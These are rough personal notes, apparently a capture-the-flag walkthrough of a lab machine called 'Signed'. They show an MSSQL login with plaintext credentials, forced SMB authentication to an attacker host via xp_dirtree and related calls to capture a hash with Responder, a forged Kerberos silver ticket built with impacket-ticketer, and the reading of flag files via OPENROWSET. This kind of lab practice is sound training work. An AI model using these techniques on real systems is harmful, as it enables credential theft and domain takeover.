Skip to main content

Signed - SQL - capture hash through SQL

lika@learning:~/Downloads/CVE-2024-8353$ impacket-mssqlclient scott:Sm230#C5NatH@$target
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott  guest@master)> select '10.10.14.14/sharesss'

--------------------
b'10.10.14.14/sharesss'

SQL (scott  guest@master)> select '10.10.14.14\sharesss'right

--------------------
b'10.10.14.14\\sharesss'

start responsder on local

sudo responsder -I tun0

nothing happend

run this

Option 1 — use xp_dirtree

This is the most common and stealthy way:

EXEC master..xp_dirtree '\10.10.14.14\sharesss';

Option 2 — use xp_fileexist

Also works:

EXEC master..xp_fileexist '\10.10.14.14\sharesss\test.txt';

Option 3 — use bulk insert

This one also triggers a remote connection:

BULK INSERT temp_table FROM '\10.10.14.14\sharesss\data.txt';

After crack pass login

impacket-mssqlclient mssqlsvc:'purPLE9795!@'@$target -windows-auth

Check admin right

SELECT IS_SRVROLEMEMBER('sysadmin');

echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl md4

If you have credentials or hashes:

impacket-samrdump SIGNED.HTB/mssqlsvc:'password'@dc01.signed.htb

or

impacket-lookupsid SIGNED.HTB/mssqlsvc:'password'@dc01.signed.htb

SELECT SUSER_SID('SIGNED\IT');

impacket-ticketer
-nthash $nthash
-domain-sid "$DOMSID"
-domain SIGNED.HTB
-spn MSSQLSvc/DC01.SIGNED.HTB
-groups 512,$IT_RID
-user-id $MSSQLSVC_RID mssqlsvc

impacket-ticketer
-nthash $nthash
-domain-sid "S-1-5-21-4088429403-1159899800-2753317549"
-domain SIGNED.HTB
-spn MSSQLSvc/DC01.SIGNED.HTB
-groups 512,1105
-user-id 1105 mssqlsvc

Convert the ccache to password file by : export KRB5CCNAME=”$(pwd)/mssqlsvc.ccache”

Command: impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass and check if the user has sysadmin rights

User & Root Flag Command: SELECT * FROM OPENROWSET(BULK N’C:\Users\mssqlsvc\Desktop\user.txt’, SINGLE_CLOB) AS t;

Command: SELECT * FROM OPENROWSET(BULK N’C:\Users\Administrator\Desktop\root.txt’, SINGLE_CLOB) AS t;

SQL (SIGNED\mssqlsvc guest@master)> SELECT CURRENT_TIMESTAMP;

2025-11-24 18:30:14

SQL (SIGNED\mssqlsvc guest@master)> SELECT SYSDATETIMEOFFSET();

Set time zone , should

lika@learning:~/Downloads$ impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS [-] ERROR(DC01): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. lika@learning:~/Downloads$ sudo date "2025-11-24 18:43:03"

[sudo] password for lika: date: invalid date ‘2025-11-24 18:43:03’ lika@learning:~/Downloads$ sudo date -s "2025-11-24 18:43:03"

Mon Nov 24 06:43:03 PM +07 2025 lika@learning:~/Downloads$ impacket-mssqlclient mssqlsvc:'purPLE9795!@'@$target -windows-auth

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[] Encryption required, switching to TLS [] ENVCHANGE(DATABASE): Old Value: master, New Value: master [] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [] INFO(DC01): Line 1: Changed database context to 'master'. [] INFO(DC01): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (SIGNED\mssqlsvc guest@master)>

javaCommand: SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;

Command: SELECT * FROM OPENROWSET(BULK N’C:\Users\Administrator\Desktop\root.txt’, SINGLE_CLOB) AS t;

impacket-ticketer
-nthash ef699384c3285c54128a3ee1ddb1a0cc
-domain-sid S-1-5-21-4088429403-1159899800-2753317549
-domain SIGNED.HTB
-spn MSSQLSvc/DC01.SIGNED.HTB
-groups 512,1105
-user-id 1105 mssqlsvc

By default, captured hashes are stored here:

/usr/share/responder/logs/

List files:

ls -l /usr/share/responder/logs/

sudo rm /usr/share/responder/Responder.db

impacket-ticketer
-nthash EF699384C3285C54128A3EE1DDB1A0CC
-domain-sid "S-1-5-21-4088429403-1159899800-2753317549"
-domain SIGNED.HTB
-spn MSSQLSvc/DC01.SIGNED.HTB
-groups 512,1105
-user-id 1103
mssqlsvc

sudo date -s "7 hours 31 minutes"

SELECT IS_SRVROLEMEMBER('sysadmin');